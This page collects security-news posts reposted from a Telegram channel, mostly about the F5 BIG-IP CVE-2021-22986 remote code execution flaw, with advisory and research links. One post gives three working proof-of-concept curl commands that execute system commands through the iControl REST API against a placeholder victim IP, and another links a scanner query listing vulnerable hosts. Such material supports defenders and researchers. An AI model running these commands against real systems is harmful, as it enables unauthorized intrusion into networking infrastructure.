■■□□□ Critical F5 BIG-IP Flaw Now Under Active Attack. CVE-2021-22986 Researchers are reporting mass scanning for – and in-the-wild exploitation of – a critical-severity flaw in the F5 BIG-IP and BIG-IQ enterprise networking infrastructure. https://t.me/cKure/7281
All posts tagged telegram
March 20, 2021 at 12:20PM
■■■■■ How APTs Use Reverse Proxies to Nmap Internal Networks. https://www.varonis.com/blog/nmap-reverse-proxies/ https://t.me/cKure/7280
March 20, 2021 at 12:14PM
■□□□□ Platform VulnMachines. https://www.vulnmachines.com https://t.me/cKure/7279
March 20, 2021 at 11:57AM
■□□□□ Pre-Auth RCE Flaw Found in F5 Big-IP Platform (CVE-2021-22986). There are over 61,000 domains, and 194,000 IP addresses were detected by Spyse scanners. All of them potentially vulnerable. Spyse search query: https://spyse.com/target/technology/F5%20BigIP https://t.me/cKure/7278
March 20, 2021 at 11:52AM
■■■■■ CVE-2021-22986: Execute arbitrary system commands create or delete files disable services. PoC #1 curl -su admin: -H “Content-Type: application/json” http://[victimIP]/mgmt/tm/util/bash -d ‘{“command”:”run”,”utilCmdArgs”:”-c id”}’ PoC #2 curl -ks https://[victimIP]/mgmt/shared/authn/login -d ‘{“bigipAuthCookie”:””,”loginReference”:{“link”:”http://localhost/mgmt/tm/access/bundle-install-tasks”},”filePath”:”id”}’ PoC #3 curl -ksu admin:[redacted] https://[vimtimIP]/mgmt/tm/access/bundle-install-tasks -d ‘{“filePath”:”id”}’ https://t.me/cKure/7273
March 20, 2021 at 11:46AM
■■■■■ CVE-2021-22986: iControl REST unauthenticated RCE. https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986 https://t.me/cKure/7272
March 20, 2021 at 11:41AM
■■□□□ Intel x86 microcode. Interesting thread. https://mobile.twitter.com/_markel___/status/1262697753945108480 https://t.me/cKure/7271
March 20, 2021 at 03:59AM
■■■■■ CVE-2021-22986: iControl REST unauthenticated remote command execution vulnerability. https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/ https://t.me/cKure/7270
March 20, 2021 at 03:50AM
■■■■■ Security Advisory Regarding F5 Vulnerabilities. The advisory acknowledges over 21 vulnerabilities in total: four critical, seven high, and ten medium CVEs in total. iControl REST unauthenticated remote command execution vulnerability CVE-2021-22986 https://support.f5.com/csp/article/K03009991 https://t.me/cKure/7269
March 20, 2021 at 03:45AM
■□□□□ Operation Exchange Marauder. Exploiting multiple zero-day vulnerabilities in Microsoft Exchange. https://www.reddit.com/r/blueteamsec/comments/lwdauf/operation_exchange_marauder_active_exploitation/ #zeroday #0day https://t.me/cKure/7268